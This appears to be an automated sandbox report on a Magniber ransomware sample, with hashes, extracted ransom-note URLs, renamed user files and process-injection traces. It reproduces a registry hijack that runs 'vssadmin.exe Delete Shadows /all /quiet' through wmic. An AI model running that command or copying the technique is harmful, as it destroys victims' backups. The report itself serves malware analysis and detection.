Overview
overview
10Static
static
81814a6a674...67.exe
windows7_x64
31814a6a674...67.exe
windows10_x64
102ca4f97e15...51.exe
windows7_x64
102ca4f97e15...51.exe
windows10_x64
103db6e8df73...3b.dll
windows7_x64
103db6e8df73...3b.dll
windows10_x64
103e2ce6fd7b...a5.exe
windows7_x64
103e2ce6fd7b...a5.exe
windows10_x64
10463b34821a...40.exe
windows7_x64
10463b34821a...40.exe
windows10_x64
34f4a33f700...72.exe
windows7_x64
104f4a33f700...72.exe
windows10_x64
853b1c1b2f4...22.exe
windows7_x64
1053b1c1b2f4...22.exe
windows10_x64
1062b2822215...d3.exe
windows7_x64
962b2822215...d3.exe
windows10_x64
96bc6f60b87...bc.dll
windows7_x64
106bc6f60b87...bc.dll
windows10_x64
106f7043b24d...1d.dll
windows7_x64
16f7043b24d...1d.dll
windows10_x64
3706a8a4fc4...1c.exe
windows7_x64
10706a8a4fc4...1c.exe
windows10_x64
107236c8098c...8e.exe
windows7_x64
107236c8098c...8e.exe
windows10_x64
1074ebfcd116...dd.dll
windows7_x64
1074ebfcd116...dd.dll
windows10_x64
107fbeac1dca...de.exe
windows7_x64
107fbeac1dca...de.exe
windows10_x64
1087e6f7b20e...89.exe
windows7_x64
387e6f7b20e...89.exe
windows10_x64
3918127c59e...3d.exe
windows7_x64
10918127c59e...3d.exe
windows10_x64
10Analysis
-
max time kernel
135s -
max time network
146s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
24-09-2021 10:27
Behavioral task
behavioral1
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
2ca4f97e15c6ddaa3276fbc56e716249dde1d2607f3b745933fedd9df3879751.exe
Resource
win7-en-20210920
Behavioral task
behavioral4
Sample
2ca4f97e15c6ddaa3276fbc56e716249dde1d2607f3b745933fedd9df3879751.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
3db6e8df73f12b6a9fa9adb6ad87b017d530a9d736909338042735ed00a9463b.dll
Resource
win7-en-20210920
Behavioral task
behavioral6
Sample
3db6e8df73f12b6a9fa9adb6ad87b017d530a9d736909338042735ed00a9463b.dll
Resource
win10v20210408
Behavioral task
behavioral7
Sample
3e2ce6fd7b53224df92581b800ce9a6605eae878d4165df9ae8f73a488be3fa5.exe
Resource
win7-en-20210920
Behavioral task
behavioral8
Sample
3e2ce6fd7b53224df92581b800ce9a6605eae878d4165df9ae8f73a488be3fa5.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe
Resource
win7-en-20210920
Behavioral task
behavioral10
Sample
463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe
Resource
win10-en-20210920
Behavioral task
behavioral11
Sample
4f4a33f70099855f5f503716515f388da3a5daa1e2fac59ec6c881e89ef7d072.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
4f4a33f70099855f5f503716515f388da3a5daa1e2fac59ec6c881e89ef7d072.exe
Resource
win10-en-20210920
Behavioral task
behavioral13
Sample
53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
53b1c1b2f41a7fc300e97d036e57539453ff82001dd3f6abf07f4896b1f9ca22.exe
Resource
win10-en-20210920
Behavioral task
behavioral15
Sample
62b28222159f1b1abe80bec49c89444448c41623a93895afafb7563fe82ffdd3.exe
Resource
win7-en-20210920
Behavioral task
behavioral16
Sample
62b28222159f1b1abe80bec49c89444448c41623a93895afafb7563fe82ffdd3.exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
6bc6f60b873ea406022459edcd2df278cb2ec7bb4d994ebd4fc02af3a57ec6bc.dll
Resource
win7-en-20210920
Behavioral task
behavioral18
Sample
6bc6f60b873ea406022459edcd2df278cb2ec7bb4d994ebd4fc02af3a57ec6bc.dll
Resource
win10v20210408
Behavioral task
behavioral19
Sample
6f7043b24d9b4c30006781402f0cef2543c8f3e9087d79f6bcff43b1418ad21d.dll
Resource
win7-en-20210920
Behavioral task
behavioral20
Sample
6f7043b24d9b4c30006781402f0cef2543c8f3e9087d79f6bcff43b1418ad21d.dll
Resource
win10v20210408
Behavioral task
behavioral21
Sample
706a8a4fc4b9f8b15c6bf1ee0fe732eaa5e069615ea126b931166672a8a5b51c.exe
Resource
win7-en-20210920
Behavioral task
behavioral22
Sample
706a8a4fc4b9f8b15c6bf1ee0fe732eaa5e069615ea126b931166672a8a5b51c.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
7236c8098c55ea1d144f4d6646e8cab8c7fdbde1d127d409b0d6a4ff1029628e.exe
Resource
win7-en-20210920
Behavioral task
behavioral24
Sample
7236c8098c55ea1d144f4d6646e8cab8c7fdbde1d127d409b0d6a4ff1029628e.exe
Resource
win10-en-20210920
Behavioral task
behavioral25
Sample
74ebfcd116fdd39217935d11ae62e48a0c44dfab822edea62ac7f611aca969dd.dll
Resource
win7v20210408
Behavioral task
behavioral26
Sample
74ebfcd116fdd39217935d11ae62e48a0c44dfab822edea62ac7f611aca969dd.dll
Resource
win10-en-20210920
Behavioral task
behavioral27
Sample
7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
Resource
win10-en-20210920
Behavioral task
behavioral29
Sample
87e6f7b20ea2bd35d947d9100fe6291dfe186cfedea5d451be14bab5d2518e89.exe
Resource
win7-en-20210920
Behavioral task
behavioral30
Sample
87e6f7b20ea2bd35d947d9100fe6291dfe186cfedea5d451be14bab5d2518e89.exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
918127c59ea7d9c0095a0add9bc93739a393d9fd64132446e7997952db07f93d.exe
Resource
win7-en-20210920
Behavioral task
behavioral32
Sample
918127c59ea7d9c0095a0add9bc93739a393d9fd64132446e7997952db07f93d.exe
Resource
win10v20210408
General
-
Target
463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe
-
Size
125KB
-
MD5
f9bf85cfb68d9e5f68bbccaf683af15c
-
SHA1
a2eae8c1350fcfa429d2af664d8320edbfabe5d3
-
SHA256
463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40
-
SHA512
07032679f19bba5690b59a6b689859d0b3611995cca6f990d2eee4b2f586493b29e70b4525e057abefe79a86695fa934f52e175a12098e0eeef7c1e3d049066a
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://f26c5ab89af4da80faqwfekni.n5fnrf4l7bdjhelx.onion/qwfekni
http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni
http://f26c5ab89af4da80faqwfekni.aimdrop.fit/qwfekni
http://f26c5ab89af4da80faqwfekni.soblack.xyz/qwfekni
http://f26c5ab89af4da80faqwfekni.sixsees.club/qwfekni
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1516 896 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1780 896 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2040 896 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1172 896 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2016 896 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1612 896 vssadmin.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1080 896 vssadmin.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1692 896 vssadmin.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2044 896 vssadmin.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1908 896 vssadmin.exe 46 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 14 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\UnregisterMount.crw => C:\Users\Admin\Pictures\UnregisterMount.crw.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\CompressRestart.tif => C:\Users\Admin\Pictures\CompressRestart.tif.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\ExpandRegister.png => C:\Users\Admin\Pictures\ExpandRegister.png.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\DenyUnregister.raw => C:\Users\Admin\Pictures\DenyUnregister.raw.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\DismountSubmit.tiff => C:\Users\Admin\Pictures\DismountSubmit.tiff.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\DisconnectPop.tif => C:\Users\Admin\Pictures\DisconnectPop.tif.qwfekni Dwm.exe File opened for modification C:\Users\Admin\Pictures\InitializeRepair.tiff Dwm.exe File renamed C:\Users\Admin\Pictures\InitializeRepair.tiff => C:\Users\Admin\Pictures\InitializeRepair.tiff.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\MountRegister.tif => C:\Users\Admin\Pictures\MountRegister.tif.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\MeasureSelect.raw => C:\Users\Admin\Pictures\MeasureSelect.raw.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\AssertInstall.tif => C:\Users\Admin\Pictures\AssertInstall.tif.qwfekni Dwm.exe File opened for modification C:\Users\Admin\Pictures\DismountSubmit.tiff Dwm.exe File renamed C:\Users\Admin\Pictures\EnableSuspend.png => C:\Users\Admin\Pictures\EnableSuspend.png.qwfekni Dwm.exe File renamed C:\Users\Admin\Pictures\ReadMount.tif => C:\Users\Admin\Pictures\ReadMount.tif.qwfekni Dwm.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 832 set thread context of 1260 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 16 PID 832 set thread context of 1344 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 13 PID 832 set thread context of 1400 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 15 PID 832 set thread context of 0 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1612 vssadmin.exe 1080 vssadmin.exe 1692 vssadmin.exe 2044 vssadmin.exe 1908 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90d9030a30b1d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000ba6b443e8285ee89e82763def662df5dd1fd255faf6e40188590141780b41fcc000000000e8000000002000020000000042ac185ef3e219c3e85943087e617d145faab79f01223f4b5094dced50766cb9000000011d0bb72feefd678bb8c30ed1755e323afa1ae6b05b6c23a830f8979fff97e8351e7d9aaacdf542eb4535dbb8dcf3e0aecf19386ab65b9d54a756659210d0b07c58078a83210a98a6a557284b2974467dd847f3cf680c5cd2097fa3354079ee7b304a814ab4e36dc4ef7f91b1c65d8d49f9fc83e95f4338f767627a3b3e305c4ca91cc6ada7c208d0480d53c55b8f4854000000048a07d1b050ad9947807c4367c38d4ee5d77493971265b162ea441241415c9a89bd21cbd841a6f3186150d7284ccf6f7702fc99f4887acb80ec6b454bf687248 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a60000000002000000000010660000000100002000000013cadabc4cab9cdeda6d9cef5760f1575e5e3533676986bf23f34ed76b8fa87f000000000e8000000002000020000000fdc096f60e9cef8bf424794a118f0c1d63dac880e3e9a14e978f7e8265ac9498200000001fdb3dc16302b2a8ba0149016fe019dc52f3948aa12b3c9f23fa294a80a6e76f40000000dc46991d1a770fcbafc6798e1133f8f90149d8c88182b7528a2a9676d0a19a616445f11f7309240cdbd3b91406ac890f9c86f7048873cc1e70eed907672c3074 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "339244719" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{29972961-1D23-11EC-A496-FE2AAAA9264A} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command Dwm.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell Dwm.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile Dwm.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1740 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1400 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1400 Explorer.EXE Token: SeShutdownPrivilege 1400 Explorer.EXE Token: SeShutdownPrivilege 1400 Explorer.EXE Token: SeShutdownPrivilege 1400 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1908 WMIC.exe Token: SeSecurityPrivilege 1908 WMIC.exe Token: SeTakeOwnershipPrivilege 1908 WMIC.exe Token: SeLoadDriverPrivilege 1908 WMIC.exe Token: SeSystemProfilePrivilege 1908 WMIC.exe Token: SeSystemtimePrivilege 1908 WMIC.exe Token: SeProfSingleProcessPrivilege 1908 WMIC.exe Token: SeIncBasePriorityPrivilege 1908 WMIC.exe Token: SeCreatePagefilePrivilege 1908 WMIC.exe Token: SeBackupPrivilege 1908 WMIC.exe Token: SeRestorePrivilege 1908 WMIC.exe Token: SeShutdownPrivilege 1908 WMIC.exe Token: SeDebugPrivilege 1908 WMIC.exe Token: SeSystemEnvironmentPrivilege 1908 WMIC.exe Token: SeRemoteShutdownPrivilege 1908 WMIC.exe Token: SeUndockPrivilege 1908 WMIC.exe Token: SeManageVolumePrivilege 1908 WMIC.exe Token: 33 1908 WMIC.exe Token: 34 1908 WMIC.exe Token: 35 1908 WMIC.exe Token: SeIncreaseQuotaPrivilege 1912 WMIC.exe Token: SeSecurityPrivilege 1912 WMIC.exe Token: SeTakeOwnershipPrivilege 1912 WMIC.exe Token: SeLoadDriverPrivilege 1912 WMIC.exe Token: SeSystemProfilePrivilege 1912 WMIC.exe Token: SeSystemtimePrivilege 1912 WMIC.exe Token: SeProfSingleProcessPrivilege 1912 WMIC.exe Token: SeIncBasePriorityPrivilege 1912 WMIC.exe Token: SeCreatePagefilePrivilege 1912 WMIC.exe Token: SeBackupPrivilege 1912 WMIC.exe Token: SeRestorePrivilege 1912 WMIC.exe Token: SeShutdownPrivilege 1912 WMIC.exe Token: SeDebugPrivilege 1912 WMIC.exe Token: SeSystemEnvironmentPrivilege 1912 WMIC.exe Token: SeRemoteShutdownPrivilege 1912 WMIC.exe Token: SeUndockPrivilege 1912 WMIC.exe Token: SeManageVolumePrivilege 1912 WMIC.exe Token: 33 1912 WMIC.exe Token: 34 1912 WMIC.exe Token: 35 1912 WMIC.exe Token: SeShutdownPrivilege 1400 Explorer.EXE Token: SeIncreaseQuotaPrivilege 976 WMIC.exe Token: SeSecurityPrivilege 976 WMIC.exe Token: SeTakeOwnershipPrivilege 976 WMIC.exe Token: SeLoadDriverPrivilege 976 WMIC.exe Token: SeSystemProfilePrivilege 976 WMIC.exe Token: SeSystemtimePrivilege 976 WMIC.exe Token: SeProfSingleProcessPrivilege 976 WMIC.exe Token: SeIncBasePriorityPrivilege 976 WMIC.exe Token: SeCreatePagefilePrivilege 976 WMIC.exe Token: SeBackupPrivilege 976 WMIC.exe Token: SeRestorePrivilege 976 WMIC.exe Token: SeShutdownPrivilege 976 WMIC.exe Token: SeDebugPrivilege 976 WMIC.exe Token: SeSystemEnvironmentPrivilege 976 WMIC.exe Token: SeRemoteShutdownPrivilege 976 WMIC.exe Token: SeUndockPrivilege 976 WMIC.exe Token: SeManageVolumePrivilege 976 WMIC.exe Token: 33 976 WMIC.exe Token: 34 976 WMIC.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE 956 iexplore.exe 1400 Explorer.EXE 1400 Explorer.EXE -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE 1400 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 956 iexplore.exe 956 iexplore.exe 1896 IEXPLORE.EXE 1896 IEXPLORE.EXE 1896 IEXPLORE.EXE 1896 IEXPLORE.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1400 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1344 wrote to memory of 1740 1344 Dwm.exe 28 PID 1344 wrote to memory of 1740 1344 Dwm.exe 28 PID 1344 wrote to memory of 1740 1344 Dwm.exe 28 PID 1344 wrote to memory of 1460 1344 Dwm.exe 29 PID 1344 wrote to memory of 1460 1344 Dwm.exe 29 PID 1344 wrote to memory of 1460 1344 Dwm.exe 29 PID 1344 wrote to memory of 1896 1344 Dwm.exe 30 PID 1344 wrote to memory of 1896 1344 Dwm.exe 30 PID 1344 wrote to memory of 1896 1344 Dwm.exe 30 PID 1400 wrote to memory of 1496 1400 Explorer.EXE 31 PID 1400 wrote to memory of 1496 1400 Explorer.EXE 31 PID 1400 wrote to memory of 1496 1400 Explorer.EXE 31 PID 1496 wrote to memory of 1908 1496 cmd.exe 38 PID 1496 wrote to memory of 1908 1496 cmd.exe 38 PID 1496 wrote to memory of 1908 1496 cmd.exe 38 PID 1896 wrote to memory of 1912 1896 cmd.exe 36 PID 1896 wrote to memory of 1912 1896 cmd.exe 36 PID 1896 wrote to memory of 1912 1896 cmd.exe 36 PID 1260 wrote to memory of 1676 1260 taskhost.exe 35 PID 1260 wrote to memory of 1676 1260 taskhost.exe 35 PID 1260 wrote to memory of 1676 1260 taskhost.exe 35 PID 1676 wrote to memory of 976 1676 cmd.exe 39 PID 1676 wrote to memory of 976 1676 cmd.exe 39 PID 1676 wrote to memory of 976 1676 cmd.exe 39 PID 832 wrote to memory of 1696 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 40 PID 832 wrote to memory of 1696 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 40 PID 832 wrote to memory of 1696 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 40 PID 1696 wrote to memory of 1720 1696 cmd.exe 42 PID 1696 wrote to memory of 1720 1696 cmd.exe 42 PID 1696 wrote to memory of 1720 1696 cmd.exe 42 PID 832 wrote to memory of 1612 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 43 PID 832 wrote to memory of 1612 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 43 PID 832 wrote to memory of 1612 832 463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe 43 PID 1612 wrote to memory of 1620 1612 cmd.exe 45 PID 1612 wrote to memory of 1620 1612 cmd.exe 45 PID 1612 wrote to memory of 1620 1612 cmd.exe 45 PID 1460 wrote to memory of 956 1460 cmd.exe 48 PID 1460 wrote to memory of 956 1460 cmd.exe 48 PID 1460 wrote to memory of 956 1460 cmd.exe 48 PID 1172 wrote to memory of 1464 1172 cmd.exe 58 PID 1172 wrote to memory of 1464 1172 cmd.exe 58 PID 1172 wrote to memory of 1464 1172 cmd.exe 58 PID 2016 wrote to memory of 752 2016 cmd.exe 60 PID 2016 wrote to memory of 752 2016 cmd.exe 60 PID 2016 wrote to memory of 752 2016 cmd.exe 60 PID 2040 wrote to memory of 1920 2040 cmd.exe 59 PID 2040 wrote to memory of 1920 2040 cmd.exe 59 PID 2040 wrote to memory of 1920 2040 cmd.exe 59 PID 1780 wrote to memory of 1212 1780 cmd.exe 61 PID 1780 wrote to memory of 1212 1780 cmd.exe 61 PID 1780 wrote to memory of 1212 1780 cmd.exe 61 PID 1516 wrote to memory of 1600 1516 cmd.exe 62 PID 1516 wrote to memory of 1600 1516 cmd.exe 62 PID 1516 wrote to memory of 1600 1516 cmd.exe 62 PID 1600 wrote to memory of 1068 1600 CompMgmtLauncher.exe 63 PID 1600 wrote to memory of 1068 1600 CompMgmtLauncher.exe 63 PID 1600 wrote to memory of 1068 1600 CompMgmtLauncher.exe 63 PID 1920 wrote to memory of 1596 1920 CompMgmtLauncher.exe 64 PID 1920 wrote to memory of 1596 1920 CompMgmtLauncher.exe 64 PID 1920 wrote to memory of 1596 1920 CompMgmtLauncher.exe 64 PID 752 wrote to memory of 1760 752 CompMgmtLauncher.exe 65 PID 752 wrote to memory of 1760 752 CompMgmtLauncher.exe 65 PID 752 wrote to memory of 1760 752 CompMgmtLauncher.exe 65 PID 1464 wrote to memory of 1544 1464 Process not Found 69
Processes
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1740
-
-
